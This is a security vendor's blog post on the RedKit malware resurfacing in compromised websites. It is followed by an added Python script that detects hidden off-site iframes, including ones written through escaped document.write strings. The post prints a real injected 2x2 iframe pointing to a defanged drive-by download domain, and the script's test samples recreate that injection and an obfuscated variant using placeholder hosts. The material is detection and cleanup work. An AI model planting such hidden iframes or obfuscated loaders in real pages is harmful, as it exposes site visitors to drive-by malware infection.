Tuesday, April 19, 2016

RedKit Malware Still Alive

RedKit as detected by Online Malware Scanner


Background

Back in 2013, we posted about RedKit infecting a significant number of websites. Three years later, the statistics of websites submitted to our online malware scanner show a revival of this malware among infected websites.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources (websites).

Malware entry

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://brg-catalogues[.]com/mzcf.html?j=1886263>

The URL in the iframe's src points to one of roughly 15 similar HTML pages (mzcf.html) hosted there, each leading to a drive-by download attack. Both domains are not flagged by Google, meaning that they have not yet been blacklisted:

Malware clean-up

Such malware is often hidden inside JavaScript files. If you suspect that your website has been infected by similar malware, Quttera experts are always happy to clean it for you: Malware Monitoring & Cleanup Plans For Websites
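The injection shown above has two tell-tale properties a site owner can check for: the frame is sized to be invisible (2x2 pixels) and its src points to a host other than the site itself. The following script is an added example, not code from the original post or from Quttera, that applies that check to an HTML file and, because the same markup is frequently written from a JavaScript file via document.write, also to iframe markup hidden in JavaScript string literals (undoing escapes such as \x3c that obfuscate the "<" of "<iframe"). All hosts in the sample data (example.com, dropper.invalid, ads.invalid, video.invalid) are constructed placeholders, and the 5-pixel threshold is an assumption chosen for illustration.

```python
"""Flag iframes that are both hidden (or tiny) and load an off-site page,
in HTML documents and in JavaScript string literals (document.write payloads).
Added example with constructed sample data; not the blog's or Quttera's code."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TINY_PX = 5  # assumption: a frame at or below this size is invisible to a visitor


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag (quoted or unquoted attrs)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _px(value):
    """Parse '2' or '2px' to an int; anything else (e.g. '100%' or '') is None."""
    try:
        return int(value.strip().lower().rstrip("px"))
    except ValueError:
        return None


def suspicious_iframes(markup, site_host):
    """Return [{'src': ..., 'reasons': [...]}] for iframes whose src is on an
    external host AND which are tiny or hidden by CSS. Visible third-party
    embeds (video players, maps) are deliberately not flagged."""
    collector = _IframeCollector()
    collector.feed(markup)
    findings = []
    for a in collector.iframes:
        src = a.get("src", "")
        host = urlparse(src).netloc.lower()
        if not host or host == site_host.lower():
            continue  # relative or same-site frame: not a distribution vector
        reasons = []
        h, w = _px(a.get("height", "")), _px(a.get("width", ""))
        if h is not None and w is not None and h <= TINY_PX and w <= TINY_PX:
            reasons.append("tiny %dx%d frame" % (w, h))
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden via CSS")
        if reasons:
            findings.append({"src": src, "reasons": ["external host " + host] + reasons})
    return findings


# Matches a single- or double-quoted JS string literal, honouring backslash escapes.
_JS_STRING = re.compile(r'''(["'])((?:\\.|(?!\1)[^\\])*)\1''', re.S)


def suspicious_iframes_in_js(js_text, site_host):
    """Run the same check over iframe markup carried in JS string literals,
    after decoding escapes such as \\x3c so an obfuscated '<iframe' is visible."""
    findings = []
    for _quote, body in _JS_STRING.findall(js_text):
        try:
            decoded = body.encode("latin-1", "backslashreplace").decode("unicode_escape")
        except UnicodeDecodeError:
            decoded = body
        if "<iframe" in decoded.lower():
            findings.extend(suspicious_iframes(decoded, site_host))
    return findings


# Constructed sample page: one benign same-site frame, one visible third-party
# embed, one 2x2 injected frame in the style shown above, one CSS-hidden frame.
SAMPLE_HTML = """
<p>Welcome</p>
<iframe src="https://example.com/map" height="400" width="600"></iframe>
<iframe src="https://video.invalid/embed" width="560" height="315"></iframe>
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dropper.invalid/mz.html?j=1>
<iframe src="https://ads.invalid/w" style="display: none"></iframe>
"""

# Constructed sample script: the iframe is written with \x3c / \x3e escapes.
SAMPLE_JS = ("var t=1;\ndocument.write('\\x3ciframe src=\"http://dropper.invalid/b.html\""
             " width=1 height=1\\x3e\\x3c/iframe\\x3e');")

if __name__ == "__main__":
    for f in suspicious_iframes(SAMPLE_HTML, "example.com"):
        print("HTML:", f["src"], "|", ", ".join(f["reasons"]))
    for f in suspicious_iframes_in_js(SAMPLE_JS, "example.com"):
        print("JS:  ", f["src"], "|", ", ".join(f["reasons"]))
```

Run against the constructed samples it reports the 2x2 frame and the CSS-hidden frame from the HTML, and the 1x1 frame reconstructed from the JavaScript string, while leaving the same-site map and the visible video embed alone. Point it at the HTML and .js files of a site (with the site's own hostname as site_host) to get a shortlist worth reviewing; it is a triage aid, not a replacement for a full scan, since attackers can also build the tag from concatenated fragments that this simple string-literal pass will not reassemble.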